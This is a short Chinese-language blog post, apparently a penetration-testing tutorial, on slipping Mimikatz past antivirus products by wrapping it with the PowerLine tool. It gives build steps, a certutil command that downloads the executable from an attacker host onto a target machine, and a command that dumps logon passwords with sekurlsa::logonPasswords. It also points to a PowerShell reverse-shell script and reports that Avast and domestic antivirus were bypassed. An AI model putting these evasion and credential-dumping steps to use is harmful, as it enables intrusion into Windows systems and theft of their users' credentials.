Powershell AV Evasion. Running Mimikatz with PowerLine

PowerShell默认存在于所有Windows 7+上,并且正在成为在Windows中执行所需脚本的最常用方法。因此产品开始阻止或警告PowerShell的使用。
网络上也有很多关于ps的混淆脚本和混淆技巧,对于国内的一些杀毒其实已经够了,但是如果遇到了比如eset/avast等杀毒就会被拦截了。
经过测试,检查防病毒是否检测到此行为,因此在执行阶段就已经失效。
图片1.png

Powerline是由Brian Fehrman(@fullmetalcache)创建的一个很棒的工具,允许调用PowerShell脚本。它是用C#编写的(不直接调用PowerShell),可以完全从命令行使用。

构建和使用:
部署构建很简单
1、从github下载代码https://github.com/fullmetalcache/PowerLine
2、运行build.bat
3、更新UserConf.xml文档以包含您要包含的ps脚本的URL
4、运行plbuilder.exe,powerline.exe生成成功
使用:
当你构件好powerline后接下来就是把powerline.exe放到目标机器上。可以通过shell上传或者远程下载功能。

certutil -urlcache -split -f http://atackerIP/PowerLine.exe PowerLine.exe

上传后执行(默认的userconf.xml中带的是invoke-mimikatz):

PowerLine.exe Invoke-Mimikatz "Invoke-Mimikatz -Command \"`\"privilege::debug`\" `\"sekurlsa::logonPasswords`\"\""

Avast(图片来自引用博客):
图片2.png
国内杀毒(图片来自本地测试):
图片3.png
可以看到已经达到了绕过的需求。
可以通过修改默认导入的ps脚本来满足不同环境下的需求。

https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

引用:

    https://github.com/fullmetalcache/PowerLine/blob/master/README.md
 https://jlajara.gitlab.io/posts/2019/01/27/Mimikatz-AV-Evasion.html

标签: none

添加新评论